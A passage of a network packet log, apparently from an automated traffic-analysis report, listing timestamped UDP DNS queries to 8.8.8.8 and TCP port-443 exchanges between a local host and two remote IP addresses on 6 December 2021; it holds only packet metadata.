Dec 6, 2021 19:08:56.535952091 CET	49725	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:56.535981894 CET	49725	443	192.168.2.3	142.250.186.65

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2021 19:08:32.669466019 CET	54154	53	192.168.2.3	8.8.8.8
Dec 6, 2021 19:08:32.689768076 CET	53	54154	8.8.8.8	192.168.2.3
Dec 6, 2021 19:08:33.583690882 CET	52806	53	192.168.2.3	8.8.8.8
Dec 6, 2021 19:08:33.603542089 CET	53	52806	8.8.8.8	192.168.2.3
Dec 6, 2021 19:08:51.778985023 CET	60784	53	192.168.2.3	8.8.8.8
Dec 6, 2021 19:08:51.790374041 CET	51143	53	192.168.2.3	8.8.8.8
Dec 6, 2021 19:08:51.794327021 CET	59026	53	192.168.2.3	8.8.8.8
Dec 6, 2021 19:08:51.814053059 CET	53	59026	8.8.8.8	192.168.2.3
Dec 6, 2021 19:08:51.819608927 CET	53	60784	8.8.8.8	192.168.2.3
Dec 6, 2021 19:08:51.831160069 CET	53	51143	8.8.8.8	192.168.2.3
Dec 6, 2021 19:08:54.998714924 CET	56238	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:55.025309086 CET	443	56238	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:55.025722027 CET	56238	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:55.052037954 CET	443	56238	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:55.052093983 CET	443	56238	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:55.052134991 CET	443	56238	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:55.052175999 CET	443	56238	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:55.052503109 CET	56238	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:55.053920984 CET	56238	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:55.114059925 CET	56238	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:55.114741087 CET	56238	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:55.147510052 CET	443	56238	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:55.148175955 CET	56238	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:55.158168077 CET	443	56238	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:55.158215046 CET	443	56238	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:55.158246040 CET	443	56238	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:55.158778906 CET	56238	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:55.184945107 CET	56238	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:56.408777952 CET	49559	53	192.168.2.3	8.8.8.8
Dec 6, 2021 19:08:56.437242031 CET	53	49559	8.8.8.8	192.168.2.3
Dec 6, 2021 19:08:58.453399897 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.479840994 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.480319023 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.506896973 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.506922960 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.506938934 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.506956100 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.507272959 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.508385897 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.537612915 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.537869930 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.571171999 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.571777105 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.572951078 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.572978973 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.573005915 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.573031902 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.573056936 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.573084116 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.573110104 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.573137045 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.573163033 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.573188066 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.573214054 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.574146986 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.574172974 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.575423002 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.575453043 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.576416969 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.576446056 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.576477051 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.576576948 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.576637030 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.576702118 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.576781034 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.576837063 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.576911926 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.576968908 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.577902079 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.577945948 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.577972889 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.578001022 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.578145027 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.578210115 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.579890966 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.579927921 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.581590891 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.581629038 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.581664085 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.581700087 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.583756924 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.583796978 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.583830118 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.583865881 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.584101915 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.584170103 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.584228992 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.584285021 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.584343910 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.586007118 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.586045027 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.586077929 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.586112976 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.589032888 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.589075089 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.589113951 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.589149952 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.590874910 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.593712091 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.593770981 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.593828917 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.593892097 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.593966007 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.595443964 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.595485926 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.595777988 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.595818043 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.597038031 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.597103119 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.597115040 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.597155094 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.598268032 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.598958969 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.598998070 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.599035978 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.599076033 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.599224091 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.599293947 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.600694895 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.600733042 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.600771904 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.600811958 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.600882053 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.600950003 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.602596045 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.602637053 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.602675915 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.602713108 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.602925062 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.602986097 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.603193045 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.603233099 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.603497028 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.605345011 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.605386019 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.605424881 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.605463028 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.605568886 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.605650902 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.608169079 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.608211994 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.608249903 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.608288050 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.608325005 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.608350039 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.608365059 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.608418941 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.608484983 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.609462976 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.609504938 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.609541893 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.609580994 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.609617949 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.609654903 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.609698057 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.609776020 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.609836102 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.611995935 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.612039089 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.612078905 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.612116098 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.612154007 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.612191916 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.612298965 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.612375021 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.612442970 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.612950087 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.612987041 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.613118887 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.614099026 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.614160061 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.614202023 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.614240885 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.614270926 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.614346027 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.616136074 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.616175890 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.616211891 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.616250992 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.616290092 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.616321087 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.616327047 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.616395950 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.616462946 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.617305994 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.617346048 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.617384911 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.617424011 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.618509054 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.618547916 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.618585110 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.618623972 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.618662119 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.618700027 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.618861914 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.619664907 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.619707108 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.619744062 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.619786024 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.619822979 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.619863033 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.619903088 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.619940042 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.621736050 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.621778965 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.621819019 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.621857882 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.621893883 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.621933937 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.621970892 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.622006893 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.622045040 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.622083902 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.622122049 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.622162104 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.622185946 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.622419119 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.624720097 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.624763012 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.624802113 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.624838114 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.624902010 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.624942064 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.624978065 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.625015974 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.625052929 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.625087976 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.628021955 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.628063917 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.628098965 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.628138065 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.628175020 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.628211975 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.628609896 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.628650904 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.629405975 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.629446983 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.629482985 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.629520893 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.630170107 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.630390882 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.631329060 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.631369114 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.631539106 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.631577969 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.631613970 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.631652117 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.632014036 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.632066965 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.632105112 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.632143974 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.633017063 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.633187056 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.633248091 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.633285046 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.633323908 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.633363008 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.633399010 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.633436918 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.633474112 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.633693933 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.634866953 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.634926081 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.635176897 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.635215044 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.635251999 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.635292053 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.635329962 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.635368109 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.635405064 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.635442019 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.636094093 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.637432098 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.637470961 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.637737989 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.637778044 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.637818098 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.637856960 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.637892008 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.637938023 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.637991905 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.638048887 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.638102055 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.638139009 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.639070988 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.639112949 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.639149904 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.639189005 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.639228106 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.639265060 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.639302969 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.639341116 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.639383078 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.639421940 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.641024113 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.641194105 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.641237974 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.641242981 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.641273975 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.641311884 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.641350031 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.641386986 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.641424894 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.641462088 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.641499996 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.641537905 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.641604900 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.642854929 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.642896891 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.642936945 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.642973900 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.643012047 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.643049955 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.643086910 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.643126011 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.643163919 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.643202066 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.643241882 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.643277884 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.643316031 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.643326998 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.643353939 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.643390894 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.643429041 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.644831896 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.644898891 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.644938946 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.644977093 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.645013094 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.645045996 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.645051956 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.645092964 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.645131111 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.645169973 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.645206928 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.645243883 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.645284891 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.645319939 CET	443	53617	142.250.186.65	192.168.2.3
